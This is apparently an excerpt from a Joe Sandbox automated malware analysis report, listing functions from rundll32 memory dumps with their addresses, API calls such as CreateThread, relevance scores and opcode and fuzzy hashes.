                    • Instruction Fuzzy Hash: 8951B1B4D15218CFDB18CF98C891B9DBBB1BF88310F2581AED809AB395D774A985CF40
                    Function 27AC18F6 Relevance: 1.5, APIs: 1, Instructions: 9threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 460 27ac18f6-27ac1908 CreateThread
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_000008CB,00000000,00000000,00000000), ref: 27AC1902
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
                    • Instruction ID: 172ebd3abfcba25a4b18c4b3e631a9a31cace7394975a7142e15f80cdbddfbe7
                    • Opcode Fuzzy Hash: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
                    • Instruction Fuzzy Hash: B0B011E2B00000BEBA00CA208F28C3B23ACE320B22300082A3C00E0008C22C8C02C230
                    Function 032E2222 Relevance: 1.3, APIs: 1, Instructions: 89memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: eef1c717db0480ee7ae8d82c64da5e3ed6e0439827a85cf705ebaf33d467185d
                    • Instruction ID: 5a376c2960964e172db17518205b48c18f1bd4dbbb9ae854cfcadeb814d511ba
                    • Opcode Fuzzy Hash: eef1c717db0480ee7ae8d82c64da5e3ed6e0439827a85cf705ebaf33d467185d
                    • Instruction Fuzzy Hash: 10410FB5A002068FDB08DF99C5946AAFBF0FF48304F14856ED859AB341D3B5A985CF91

                    Non-executed Functions

                    Function 06935489 Relevance: 87.5, Strings: 54, Instructions: 20001COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*R*R*$R*R*R*R*
                    • API String ID: 0-1454091619
                    • Opcode ID: 62563def212243d8178ba663f0b655967fc323b9dd6523733f914879c3ab1325
                    • Instruction ID: 37f9bc41903ace124b5543487caff1a664107a1f3e2c5f0a91ff7d8ebcbf1441
                    • Opcode Fuzzy Hash: 62563def212243d8178ba663f0b655967fc323b9dd6523733f914879c3ab1325
                    • Instruction Fuzzy Hash: DA64F77BB546114FC72CCE6DC8D12E5F3D7ABCC304B1A963E894ADB248DE74A90986C0
                    Function 06946014 Relevance: 27.3, Strings: 17, Instructions: 6097COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*
                    • API String ID: 0-467962880
                    • Opcode ID: db763a7a03a500db51229c764c6829f90b410a70742696e8993980de9d24f429
                    • Instruction ID: 4751ba86f6a2924c3fd5e944242fc8ef555336e7bde1723dbf0f82c351b51135
                    • Opcode Fuzzy Hash: db763a7a03a500db51229c764c6829f90b410a70742696e8993980de9d24f429
                    • Instruction Fuzzy Hash: D5A3FA7BB546114FC72CCE6DC8D12E5F3D7ABCC304B1A963E894ADB258DE74A90986C0
                    Function 0696A7D0 Relevance: 2.5, Strings: 1, Instructions: 1271COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &Fd
                    • API String ID: 0-2012438766
                    • Opcode ID: 15cd8743834b1449a3caecffaba72ba942d6790621cebc0b0187d792b265e2c6
                    • Instruction ID: 807ecc35dafa3398a8ac178fb7dcc318dd9d9b9f0e1e17d3745d59cc1b83e07b
                    • Opcode Fuzzy Hash: 15cd8743834b1449a3caecffaba72ba942d6790621cebc0b0187d792b265e2c6
                    • Instruction Fuzzy Hash: A1B2F6B6A143428BD768CF25C851BABB7E7BFC4310F198A2DE199DB294DB34D406CB41
                    Function 06971DC0 Relevance: 2.1, Strings: 1, Instructions: 873COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: UR
                    • API String ID: 0-2961163533
                    • Opcode ID: c188c6932d42ef79e805733efa0248251d5216e33a19605042e32e66f80d4b6f
                    • Instruction ID: e7689eeca001dcf906d53d0e281cba9f606f1cfdc34100f9eebb923f4424a6c5
                    • Opcode Fuzzy Hash: c188c6932d42ef79e805733efa0248251d5216e33a19605042e32e66f80d4b6f
                    • Instruction Fuzzy Hash: B442173BF1462247E7288A29CD953A56286ABC4314F1F473D8D5BEFBC5DD38AE4582C0
                    Function 0695CDD0 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: M
                    • API String ID: 0-3664761504
                    • Opcode ID: 06db056f8dcf7050b2a93bdcd254552bc21d1488ee3073b2d6db623a86a3b236
                    • Instruction ID: 1313b5a38851b90560cd4a9e468c1eab955f4482db3047d65ca741268314d887
                    • Opcode Fuzzy Hash: 06db056f8dcf7050b2a93bdcd254552bc21d1488ee3073b2d6db623a86a3b236
                    • Instruction Fuzzy Hash: DF71A232918361CFC760CF29D88065AF7E2BBC5314F5A8A1DEDD4AB754D631AD06CB82
                    Function 06832F7C Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: Y
                    • API String ID: 0-3233089245
                    • Opcode ID: 4e5e036f1e740a813275def05678c08674c8ed70b1e3c405654613b96e2d860d
                    • Instruction ID: 310f25c88d0773d25dacccf93e68602c29c2949622037653dca2ca576f3a0260
                    • Opcode Fuzzy Hash: 4e5e036f1e740a813275def05678c08674c8ed70b1e3c405654613b96e2d860d
                    • Instruction Fuzzy Hash: 8A51D676A093548FD360CF29C84065AF7E2BFC8314F2A8959E598DB320D771A846CF92
                    Function 068349DC Relevance: .9, Instructions: 910COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9de2f20dde104f06f924e31ff961693c8c3ecccffa24225dd661cc4758e957f
                    • Instruction ID: e63f04b81e34c1cb8fc934dc6d641e887215f872720f71d8728377ba65526388
                    • Opcode Fuzzy Hash: e9de2f20dde104f06f924e31ff961693c8c3ecccffa24225dd661cc4758e957f
                    • Instruction Fuzzy Hash: B99234716083968FC374CF28C885AAEB7E2FFC9314F158A5DD589DB250D730A985CB92
                    Function 0683371C Relevance: .8, Instructions: 760COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 716232f1e5de10e987ca83305fcfe075b29600fb59f8d1fda0b947554e15446a
                    • Instruction ID: 2b04ecbaa4dff0f5cc3d6049cc8d37a52d0cc409e5ca1bfb33d409ebf8ccb269
                    • Opcode Fuzzy Hash: 716232f1e5de10e987ca83305fcfe075b29600fb59f8d1fda0b947554e15446a
                    • Instruction Fuzzy Hash: C77235326183A6CFC775CF28C585ADEB7E5FF89304F118A19D489DB244D770AA85CB82
                    Function 0509252C Relevance: .7, Instructions: 718COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbb2915cff33516987db77e0faa8a7002d006ec5f3c2c27b49ee9b8391ff9718
                    • Instruction ID: a89849406ed7c3d30944365bf3dfde3fde936b62ef320e953d94ba9bb174af53
                    • Opcode Fuzzy Hash: dbb2915cff33516987db77e0faa8a7002d006ec5f3c2c27b49ee9b8391ff9718
                    • Instruction Fuzzy Hash: F3620935209382DFCB7ACF24D5C4AEEB7E6BB85310F118D2DD4898B248D770AA45DB52
                    Function 05091698 Relevance: .4, Instructions: 377COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db771775960a5fbb083151c72e414653ce32c5067ecdcfe2857e6f96fc64c7fa
                    • Instruction ID: e35fe70273b89725e39f6950c3123a930941ac684ae941703050f48308f7d96d
                    • Opcode Fuzzy Hash: db771775960a5fbb083151c72e414653ce32c5067ecdcfe2857e6f96fc64c7fa
                    • Instruction Fuzzy Hash: A6F1D035608382CBCB7DCF24D5A0AEEB7E2BFC9310F55891DD49A4B288DB706845DB52
                    Function 06985990 Relevance: .3, Instructions: 340COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a20331811072f813c3ee420249375eaace0407761e82479562c97d9baf7154c
                    • Instruction ID: 33ca250fd5e461cf3d55302aca48daff0250bc1afb3f17696a10e7dc16e916c3
                    • Opcode Fuzzy Hash: 3a20331811072f813c3ee420249375eaace0407761e82479562c97d9baf7154c
                    • Instruction Fuzzy Hash: A4F10871A0C3818FD7B9DF14C494AEAF7A2BFC9310F51896DD58A4B741DB706884CB52
                    Function 0693408E Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7119f3cea1e5e38f9f6aa015c6d7bfa22593524fbcfc877daee7645a54b8f6b
                    • Instruction ID: 7a32e0bb04e16154d8ab42eb2b9288f71851ef5111f223d0c13334355f00f435
                    • Opcode Fuzzy Hash: f7119f3cea1e5e38f9f6aa015c6d7bfa22593524fbcfc877daee7645a54b8f6b
                    • Instruction Fuzzy Hash: 2991373BB545214F872CCE7DC9915A9F6D76BCC314B0ED27E884ADB298ED74A8058AC0
                    Function 06833334 Relevance: .2, Instructions: 243COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03521c179b3f611a84f231b5453ba554a274005bc161645469145d70485d42ab
                    • Instruction ID: 4c5f07f73204bbf3c9cea8096af36e06f587e367324ba7878b15998de8b6ebcd
                    • Opcode Fuzzy Hash: 03521c179b3f611a84f231b5453ba554a274005bc161645469145d70485d42ab
                    • Instruction Fuzzy Hash: 8CB12532609391CFD779CF24C5A1BAEBBE2BFC4314F15492DD68A97280DB706845CB92
                    Function 069855F0 Relevance: .2, Instructions: 240COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 318300acc4b006602dc2df9f1139746d93e9713e5308de6a7f1d26e53df0278b
                    • Instruction ID: 3ec33f860a6f62f892de88881e5c38265a654824471f2fb26aaba0f65e71b2cd
                    • Opcode Fuzzy Hash: 318300acc4b006602dc2df9f1139746d93e9713e5308de6a7f1d26e53df0278b
                    • Instruction Fuzzy Hash: 62A15D31A19341CFE3A4DF15C980B5BB7A7BFC5304F65CA2ED4890B658C734A80ACB92
                    Function 0696D4C0 Relevance: .2, Instructions: 238COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e48349c815fb971bfd78627a1a6a8f0a20497d7546ae5d27d6a89e8d164e96a
                    • Instruction ID: 6ef6f2a391ebe57c48e1315e3c20915a1bad0602483ff0c7f50989f7438df21a
                    • Opcode Fuzzy Hash: 2e48349c815fb971bfd78627a1a6a8f0a20497d7546ae5d27d6a89e8d164e96a
                    • Instruction Fuzzy Hash: 8AA19A726083518FD764DF29C580BAAB7E2FFC4304F61891DE8A9DB645D730E845CB92
                    Function 068318AC Relevance: .2, Instructions: 234COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 46a5664e88dae3e7d861700319d29678efed1d883b9378f2c44d5ed7bbb49bb9
                    • Instruction ID: b20f69e5297bf9b9e3a23e38efe4e67b8d9b2e316270dd71ec544fd14fe8ac97
                    • Opcode Fuzzy Hash: 46a5664e88dae3e7d861700319d29678efed1d883b9378f2c44d5ed7bbb49bb9
                    • Instruction Fuzzy Hash: 6BB1E2719083A18FC778CF14C194BAEF7E2BB88710F16892ED9CA67750DB306845CB92
                    Function 05094094 Relevance: .2, Instructions: 225COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a79510364ff48fc4704dc8a4d225233301c9abbcc194d64ae6688eeb2c594c23
                    • Instruction ID: 10594259e6dee8519afeb23e7b88f45404a7b0aa6d0671e83c70e011c9c71cec
                    • Opcode Fuzzy Hash: a79510364ff48fc4704dc8a4d225233301c9abbcc194d64ae6688eeb2c594c23
                    • Instruction Fuzzy Hash: F7B1E2719083918FCB79CF24D190BAEF7E2BF98310F51892DD9DA27644C7306846CB92
                    Function 051B7410 Relevance: .2, Instructions: 223COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8e9aff202e725d3366fc1f2198c0b12b75e6229e9f783b725f1388bb12e5a6c
                    • Instruction ID: 5b258434975c8f2f81e59c8bcfaf9bd5548b64d3afea5a7fe5a0c06847e04507
                    • Opcode Fuzzy Hash: b8e9aff202e725d3366fc1f2198c0b12b75e6229e9f783b725f1388bb12e5a6c
                    • Instruction Fuzzy Hash: E7A1B371208381CFE734CF18C980BAAB7E2FBC4314F55892DE5899B355D774E9458BA2
                    Function 069709D0 Relevance: .2, Instructions: 184COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 292d0ae7f8bbd603e8061b1c268573112d2258c28403e0aec90810e2d488b807
                    • Instruction ID: 4dc4940b2bda389ce9fa3af3c5926ae1852d6267dd56dd35ecd7b63756022932
                    • Opcode Fuzzy Hash: 292d0ae7f8bbd603e8061b1c268573112d2258c28403e0aec90810e2d488b807
                    • Instruction Fuzzy Hash: AF719D716083818FD764CF29C994B5BBBE6BFC5324F288A18E498CB795D730E845CB52
                    Function 051B1240 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54231b116081781884383f592c89dc5c38d6415ca62a533ff6aeb7b1f3f046ed
                    • Instruction ID: 1d4e2703824222f4711256b1e929faa8d05df2c23784eeddee3339439aecc311
                    • Opcode Fuzzy Hash: 54231b116081781884383f592c89dc5c38d6415ca62a533ff6aeb7b1f3f046ed
                    • Instruction Fuzzy Hash: DB51BC366483418FC710CF28D4909AAB7E2FFC9314F6A4959E5959B354E770F906CB82
                    Function 050945E8 Relevance: .1, Instructions: 142COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6d4cdfbc7f0441d07de53e951f455ebf7350737eff986016d0d340e4900288ec
                    • Instruction ID: 7b0bbdcc9fa585d90e160925fc38db356f17169f0f5613a233533826ef08cc3c
                    • Opcode Fuzzy Hash: 6d4cdfbc7f0441d07de53e951f455ebf7350737eff986016d0d340e4900288ec
                    • Instruction Fuzzy Hash: 1E5157768182758BCB28CF18D44056AF7E1BF85720F1A4A5DEDD87B295D730AC42DBC2
                    Function 06835AF1 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f9c7d58bf71c2c59d0ce9828359ff225ba700ec549f7e948aa946d2eeb38c9b
                    • Instruction ID: 2787765381eb67801843806855c5fafce3dea04a95c47bab40d67095c963faf8
                    • Opcode Fuzzy Hash: 1f9c7d58bf71c2c59d0ce9828359ff225ba700ec549f7e948aa946d2eeb38c9b
                    • Instruction Fuzzy Hash: D65137316083908FD761CF25C591B9FBBE3ABC6318F258A1CD1C987659C730A84ACB83
                    Function 069821E0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b0a38611135c484f74209aa46b1778b706df89739fde6067a91bfb6fb228b8b
                    • Instruction ID: 8e67fc2e60303c304d739b8ed6f9c38d848c4d5f23d1a0e6716261bd956706ba
                    • Opcode Fuzzy Hash: 8b0a38611135c484f74209aa46b1778b706df89739fde6067a91bfb6fb228b8b
                    • Instruction Fuzzy Hash: 90417D326183908FD704DF28C45002EFBE6BFCA710F2A4A5EE5969B350C274E946CBC2
                    Function 05094458 Relevance: .1, Instructions: 111COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62f25fdd1ff2e83fcda1b199fe1b8d0ef79c735b3db8ff7d233ae55f78333565
                    • Instruction ID: aaf12844fdbfab20fba2132c113d899cb6ae6f071370fe28c367eecb40410479
                    • Opcode Fuzzy Hash: 62f25fdd1ff2e83fcda1b199fe1b8d0ef79c735b3db8ff7d233ae55f78333565
                    • Instruction Fuzzy Hash: 1841B3302082A18BCF08CF69D49082FBBE2BFC9710F55891DF4C59B295D674E906DB92